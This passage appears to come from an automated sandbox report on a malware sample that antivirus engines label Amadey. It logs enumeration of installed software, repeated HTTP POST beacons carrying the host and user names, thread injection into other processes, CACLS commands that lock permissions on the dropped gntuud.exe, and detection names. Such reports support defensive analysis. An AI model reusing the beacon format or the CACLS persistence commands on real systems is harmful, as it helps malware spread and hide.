 key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
process gntuud.exe useragent
process mp3studios_97.exe useragent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef2ce6e00,0x7fef2ce6e10,0x7fef2ce6e20
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1076,11771011546915947676,13004804993852951777,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1080 /prefetch:2
Time & API Arguments Status Return Repeated

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0
Process injection Process 2704 resumed a thread in remote process 2768
Process injection Process 2824 resumed a thread in remote process 3052
Process injection Process 2572 resumed a thread in remote process 2376
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000002c4
suspend_count: 1
process_identifier: 2768
1 0 0

NtResumeThread

 thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 3052
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0
cmdline cmd /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\9c69749b54" /P "test22:N"&&CACLS "..\9c69749b54" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\9c69749b54" /P "test22:N"&&CACLS "..\9c69749b54" /P "test22:R" /E&&Exit
cmdline CACLS "gntuud.exe" /P "test22:R" /E
cmdline CACLS "..\9c69749b54" /P "test22:N"
cmdline CACLS "..\9c69749b54" /P "test22:R" /E
cmdline CACLS "gntuud.exe" /P "test22:N"
Bkav W32.AIDetect.malware2
Lionic Trojan.Win32.Deyma.4!c
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
McAfee Artemis!369321F33D5F
Cylance Unsafe
VIPRE Gen:Variant.Lazy.158178
Sangfor Trojan.Win32.Save.a
Alibaba TrojanDownloader:Win32/Amadey.a5fd8235
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Trojan.Lazy.D269E2
Cyren W32/Amadey.A.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Gen:Variant.Lazy.158178
MicroWorld-eScan Gen:Variant.Lazy.158178
Avast Win32:BotX-gen [Trj]
Ad-Aware Gen:Variant.Lazy.158178
Sophos Mal/Horst
FireEye Generic.mg.369321f33d5ffaee
Emsisoft Gen:Variant.Lazy.158178 (B)
SentinelOne Static AI - Malicious PE
Jiangmin TrojanDownloader.Deyma.akw
Kingsoft Win32.Troj.Generic_a.a.(kcloud)
Gridinsoft Trojan.Win32.Gen.bot
Microsoft Trojan:Win32/Amadey.PAB!MTB
GData Gen:Variant.Lazy.158178
Google Detected
AhnLab-V3 Malware/Win.Trojanspy.C5238800
Acronis suspicious
BitDefenderTheta Gen:NN.ZexaF.36106.puW@amB2DIoi
ALYac Gen:Variant.Lazy.158178
MAX malware (ai score=84)
Malwarebytes Trojan.Amadey
TrendMicro-HouseCall TROJ_GEN.R002C0RL722
Rising Trojan.Generic@AI.100 (RDML:mMTw7NwLuqPivtIFNn7ejQ)
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Injector.EGTS!tr
AVG Win32:BotX-gen [Trj]
Cybereason malicious.33d5ff
Panda Trj/Genetic.gen